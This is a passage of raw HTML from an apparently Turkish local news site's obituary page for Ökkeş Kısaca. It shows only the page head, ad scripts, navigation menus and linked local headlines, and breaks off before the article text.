
<!DOCTYPE html> <html lang="tr" class="no-inlinesvgsite-center" itemscope itemtype="http://schema.org/NewsArticle"> <head> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7914883170465839", enable_page_level_ads: true }); </script> <title>Ökkeş Kısaca</title> <meta charset="utf-8"> <!--meta name="viewport" content="width=device-width, initial-scale=1.0"--> <meta name="description" content="Ökkeş Kısaca"> <meta name="keywords" content=""> <meta name="news_keywords" content=""> <meta name="author" content="Elbistanın Sesi" /> <meta property="fb:admins" content=""> <meta property="og:site_name" content="Elbistanın Sesi"> <meta property="og:title" content="Ökkeş Kısaca"> <meta property="og:description" content="Ökkeş Kısaca"> <meta property="og:url" content="http://www.elbistaninsesi.com/vefatlar/okkes-kisaca-h64429.html"> <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2019/10/okkes_kisaca_h64429_2d76e.jpg"> <meta property="og:type" content="article"> <meta http-equiv="refresh" content="3000"> <meta name="twitter:card" content="summary_large_image"> <meta name="og:title" content="Ökkeş Kısaca"> <meta name="twitter:url" content="http://www.elbistaninsesi.com/vefatlar/okkes-kisaca-h64429.html"> <meta name="twitter:domain" content="http://www.elbistaninsesi.com/"> <meta name="twitter:site" content="elbistaninsesi"> <meta name="twitter:title" content="Ökkeş Kısaca"> <meta name="twitter:description" content="Ökkeş Kısaca"> <meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2019/10/okkes_kisaca_h64429_2d76e.jpg"> <link rel="alternate" href="http://www.elbistaninsesi.com/" hreflang="tr-default" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print, handheld"> <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" /> <link href='http://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link href='http://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="http://fonts.googleapis.com/css?family=Roboto+Slab:700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link rel="canonical" href=""> <link rel="publisher" href="#" /> <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2019/10/okkes_kisaca_h64429_2d76e.jpg" /> <meta itemprop="headline" content="Ökkeş Kısaca" /> <meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/okkes_kisaca_h64429_2d76e.jpg" /> <meta itemprop="articleSection" content="Vefatlar" name="section" /> <meta itemprop="dateCreated" content="2019-10-11T11:58:52+02:00" /> <meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2019/10/okkes_kisaca_h64429_2d76e.jpg" /> <meta itemprop="genre" content="news" name="medium" /> <meta itemprop="inLanguage" content="tr-TR" /> <meta itemprop="keywords" content="" name="keywords" /> <!--[if gte IE 9]> <style type="text/css"> .gradient { filter: none; } </style> <![endif]--> <!--[if IE 7]> <style type="text/css"> .reklam.dikey.sol .fixed { margin-left:-px; } </style> <![endif]--> <script type="text/javascript"> var site_url = 'http://www.elbistaninsesi.com/'; var tema = 'hs-rush-php'; var theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/'; var ajax_url = '_ajax/'; var cat_limit = '10'; var headerayar = 'header_genis'; var poll_voted = ''; var comment_approved = '0'; var doviz = '1'; var lazyload = '0'; var twitter_user = 'elbistaninsesi'; var facebook_user = 'elbistaninsesi'; var popup_saat = '1'; var yorum_harf_ayar = '1'; var hava = '0'; var hava_default = '15888'; var namaz = '1'; var iftara_kalan_sure = '0'; var namaz_default = 'kahramanmaras'; var superlig = '1'; var uye_gir = 'Üye Girişi'; var uye_ol = 'Üye Ol'; var cikis_yap = 'Çıkış Yap'; var baglan_fb = 'Facebook ile Bağlan'; var analitik_ga = 'UA-21655627-1'; </script> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7533583759274488", enable_page_level_ads: true }); </script> </head> <body> <!-- HEADER --> <div id="siteHeader" class="header fluid row-fluid"> <div id="header-top" class="header-top row-fluid"> <div class="header-top-container"> <div class="header-top-block header-top-cycle"> <div class="header-top-currency"> <div class="currency-cycle"> <div class="currency-dolar glyphicons white usd">DOLAR <span class="currency-rate"></span></div> <div class="currency-euro glyphicons white euro">EURO <span class="currency-rate"></span></div> <div class="currency-altin glyphicons white coins">ALTIN <span class="currency-rate"></span></div> <div class="currency-bist glyphicons white global">BIST <span class="currency-rate"></span></div> </div> </div> <div class="header-top-hot mleft"> <div class="hot-cycle"> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/araba-fiyatina-ulasan-kurbanliklar-alici-bekliyor-h63829.html" title="Araba fiyatına ulaşan kurbanlıklar alıcı bekliyor" >Araba fiyatına ulaşan kurbanlıklar alıcı bekliyor</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/komur-sahasinda-gocuk-1-isci-hayatini-kaybetti-h60703.html" title="Kömür sahasında göçük: 1 işçi hayatını kaybetti" >Kömür sahasında göçük: 1 işçi hayatını kaybetti</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/unal-stk-temsilcileri-ile-sahurda-bulustu-h57204.html" title="Ünal STK temsilcileri ile sahurda buluştu" >Ünal STK temsilcileri ile sahurda buluştu</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/arslan-kudus-sahipsiz-degildir-h57124.html" title="Arslan: “Kudüs sahipsiz değildir”" >Arslan: “Kudüs sahipsiz değildir”</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/politika/oztunc-24-haziranda-elbistanda-sandiklari-patlatacagiz-h56762.html" title="Öztunç: “24 Haziran’da Elbistan’da sandıkları patlatacağız”" >Öztunç: “24 Haziran’da Elbistan’da sandıkları patlatacağız”</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/vefatlar/aziz-temur-anma-h55750.html" title="Aziz Temur Anma" >Aziz Temur Anma</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/ekonomi/kahramanmaras-kivisi-tezgahlardaki-yerini-aldi-h49076.html" title="Kahramanmaraş kivisi tezgahlardaki yerini aldı" >Kahramanmaraş kivisi tezgahlardaki yerini aldı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/politika/ak-partili-debgici-yeniden-aday-h49075.html" title="AK Parti’li Debgici yeniden aday" >AK Parti’li Debgici yeniden aday</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/haberde-insan/kadinlarin-kislik-yufka-ekmek-telasi-h49074.html" title="Kadınların kışlık yufka ekmek telaşı" >Kadınların kışlık yufka ekmek telaşı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/asayis/keci-otlatirken-kayaliklardan-dustu-h48619.html" title="Keçi otlatırken kayalıklardan düştü" >Keçi otlatırken kayalıklardan düştü</a> </div> </div> </div> </div> <div class="header-top-block header-top-right"> <div class="header-top-user"> <div class="btn-group"> <button class="btn btn-user dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button> <ul id="memberArea" class="dropdown-menu"> </ul> </div> </div> </div> <div id="sb-search" class="header-top-block header-top-search sb-search"> <form action="http://www.elbistaninsesi.com/" method="get"> <input type="hidden" name="m" value="arama"> <input class="sb-search-input" placeholder="Haber Ara ..." type="search" name="q" id="search"> <input type="hidden" name="auth" value="195ffb329d4f1665395890776d4865d571c5d34c" /> <input class="sb-search-submit" type="submit" value=""> <span class="sb-icon-search"></span> </form> </div> </div> </div> <div id="logo" class="row-fluid"> <div class="container"> <div class="span3"> <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Ökkeş Kısaca" /></a></span> </div> </div> </div> <div id="menu" class="row-fluid"> <div class="kategori"> <div class="container"> <a href="http://www.elbistaninsesi.com/" class="darken glyphicons home"></a> <a href="http://www.elbistaninsesi.com/yazarlar.html" class="blue glyphicons group">Yazarlar</a> <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7" class="current" >Vefatlar</a> <a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" >Güncel</a> <a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2" >Politika</a> <a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4" >Sağlık</a> <a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5" >Eğitim / Kültür</a> <a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1" >Spor</a> <a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3" >Ekonomi</a> <a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9" >Arşiv Özel</a> <a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13" >Seçim Sonucu</a> <a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17" >YEREL</a> <div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">TÜM KATEGORİLER</a></div> <div class="othercat"> <div class="inner"> <div class="clearfix"> <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19" >ASAYİŞ</a> <a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20" >KÜLTÜR-SANAT</a> <a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21" >GENEL</a> <a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22" >DÜNYA</a> <a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48" >EĞİTİM</a> <a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53" >ÇEVRE</a> <a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60" >MAGAZİN</a> <a title="HABERDE İNSAN" href="http://www.elbistaninsesi.com/haberde-insan" id="k71" >HABERDE İNSAN</a> </div> </div> </div> </div> </div> <div id="katicerik" class="row-fluid"> <div class="container"><div class="katelement kat_k7"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/okkes-kisaca-h64429.html" title="Ökkeş Kısaca"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/okkes_kisaca_h64429_2d76e.jpg" alt="Ökkeş Kısaca" /> Ökkeş Kısaca</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/zuleyha-unsal-53-yasinda-h64418.html" title="Züleyha Ünsal 53 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/zuleyha_unsal_53_yasinda_h64418_bf1a3.jpg" alt="Züleyha Ünsal 53 yaşında" /> Züleyha Ünsal 53 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/salih-bildirici-86-yasinda-h64407.html" title="Salih Bildirici 86 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/salih_bildirici_86_yasinda_h64407_8e17d.jpg" alt="Salih Bildirici 86 yaşında" /> Salih Bildirici 86 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/durdu-mehmet-temizsoy-81-yasinda-h64406.html" title="Durdu Mehmet Temizsoy 81 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/durdu_mehmet_temizsoy_81_yasinda_h64406_a06f5.jpg" alt="Durdu Mehmet Temizsoy 81 yaşında" /> Durdu Mehmet Temizsoy 81 yaşında</a> </div> </div></div><div class="katelement kat_k8"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/euas-komisyonu-calismalarini-yapiyor-h64434.html" title="EÜAŞ komisyonu çalışmalarını yapıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/euas_komisyonu_calismalarini_yapiyor_h64434_4dc39.jpg" alt="EÜAŞ komisyonu çalışmalarını yapıyor" /> EÜAŞ komisyonu çalışmalarını yapıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-osb-ziyaretlerini-surduruyor-h64433.html" title="Kaymakam Demir, OSB ziyaretlerini sürdürüyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/kaymakam_demir_osb_ziyaretlerini_surduruyor_h64433_c904f.jpg" alt="Kaymakam Demir, OSB ziyaretlerini sürdürüyor" /> Kaymakam Demir, OSB ziyaretlerini sürdürüyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/guvenlik-korucularindan-baris-pinari-harekatina-tam-destek-h64432.html" title="Güvenlik korucularından Barış Pınarı Harekatı’na tam destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/guvenlik_korucularindan_baris_pinari_harekatina_tam_destek_h64432_2bc84.jpg" alt="Güvenlik korucularından Barış Pınarı Harekatı’na tam destek" /> Güvenlik korucularından Barış Pınarı Harekatı’na tam destek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/basaran-devletimizin-ve-kahraman-ordumuzun-emrindeyiz-h64431.html" title="Başaran: “Devletimizin ve kahraman ordumuzun emrindeyiz”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/basaran_devletimizin_ve_kahraman_ordumuzun_emrindeyiz_h64431_d59c3.jpg" alt="Başaran: “Devletimizin ve kahraman ordumuzun emrindeyiz”" /> Başaran: “Devletimizin ve kahraman ordumuzun emrindeyiz”</a> </div> </div></div><div class="katelement kat_k2"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" /> MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/baskan-eker-mazbatasini-aldi-h62471.html" title="Başkan Eker, mazbatasını aldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/baskan_eker_mazbatasini_aldi_h62471_6d495.JPG" alt="Başkan Eker, mazbatasını aldı" /> Başkan Eker, mazbatasını aldı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/oztunctan-gungore-hayirli-olsun-ziyareti-h62469.html" title="Öztunç’tan Güngör’e hayırlı olsun ziyareti"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/oztunctan_gungore_hayirli_olsun_ziyareti_h62469_f4649.jpg" alt="Öztunç’tan Güngör’e hayırlı olsun ziyareti" /> Öztunç’tan Güngör’e hayırlı olsun ziyareti</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/iste-partilerin-oy-dagilimi-h62445.html" title="İşte partilerin oy dağılımı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/iste_partilerin_oy_dagilimi_h62445_7a2a4.JPG" alt="İşte partilerin oy dağılımı" /> İşte partilerin oy dağılımı</a> </div> </div></div><div class="katelement kat_k4"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" /> Crown Dental hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" /> Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" /> Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" /> EDH, obezite cerrahisinde söz sahibi olmaya başladı</a> </div> </div></div><div class="katelement kat_k5"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" /> Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" /> Otizmli çocuklar için özel etkinlik</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" /> Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" /> Nurhak Kaymakamlığı’ndan eğitime özel destek</a> </div> </div></div><div class="katelement kat_k1"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/zorlu-mucadelede-kazanan-cikmadi-h64379.html" title="Zorlu mücadelede kazanan çıkmadı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/zorlu_mucadelede_kazanan_cikmadi_h64379_1d578.JPG" alt="Zorlu mücadelede kazanan çıkmadı" /> Zorlu mücadelede kazanan çıkmadı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/ardictan-taraftara-destek-daveti-h64350.html" title="Ardıç’tan taraftara destek daveti"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/ardictan_taraftara_destek_daveti_h64350_9979f.jpg" alt="Ardıç’tan taraftara destek daveti" /> Ardıç’tan taraftara destek daveti</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-ilk-macindan-1-puan-cikardi-h64247.html" title="Elbistanspor, ilk maçından 1 puan çıkardı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/elbistanspor_ilk_macindan_1_puan_cikardi_h64247_4ccde.JPG" alt="Elbistanspor, ilk maçından 1 puan çıkardı" /> Elbistanspor, ilk maçından 1 puan çıkardı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/spor-toto-bolgesel-amator-lig-fikstur-cekimi-yapildi-h64042.html" title="Spor Toto Bölgesel Amatör Lig fikstür çekimi yapıldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/spor_toto_bolgesel_amator_lig_fikstur_cekimi_yapildi_h64042_c4586.jpg" alt="Spor Toto Bölgesel Amatör Lig fikstür çekimi yapıldı" /> Spor Toto Bölgesel Amatör Lig fikstür çekimi yapıldı</a> </div> </div></div><div class="katelement kat_k3"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" /> Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" /> ETSO ve TEB kredi protokolü imzaladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" /> DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/tedavi-sureclerinde-meslek-sahibi-olacaklar-h60414.html" title="Tedavi süreçlerinde meslek sahibi olacaklar"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2018/10/tedavi_sureclerinde_meslek_sahibi_olacaklar_h60414_dbbab.JPG" alt="Tedavi süreçlerinde meslek sahibi olacaklar" /> Tedavi süreçlerinde meslek sahibi olacaklar</a> </div> </div></div><div class="katelement kat_k9"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" /> 17 EKİM 1968 PAZARTESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" /> 13 EKİM 1968 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" /> 17 AĞUSTOS 1967 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" /> 30 MAYIS 1959 CUMARTESİ</a> </div> </div></div><div class="katelement kat_k13"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" /> 16 Nisan 2017 Anayasa Değişikliği Referandumu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" /> 1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" /> 7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"></div></div><div class="katelement kat_k17"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" /> KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" /> Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" /> Öğrenciler hedefi 12’den vurmak için yarıştı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" /> Piazza’da indirim yarışı</a> </div> </div></div> </div> </div> </div> </div> <div id="mainContainer" class="container center shadow" style="padding-top:15px;"> <img src="http://www.elbistaninsesi.com/images/aboneol.jpg" width="937" height="45" /><br> <br> <!-- Üst Manşet --> <div id="ustkisim" class="row"> <div class="span12 reklam reklam106"><a href="http://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/sedir_et_mangal.jpg&w=980&h=250&q=90" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner136" /></a></div> <div id="ustmanset" class="span12"> <div class="row-fluid"> <ul class="thumbnails five"> <li class="span3"><a href="http://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/10/Ysimsiz-13.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" class="pull-left" /> <div class="caption-line"><p>Barış Pınarı Harekatı’nda terör örgütüne...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/euas-komisyonu-calismalarini-yapiyor-h64434.html" 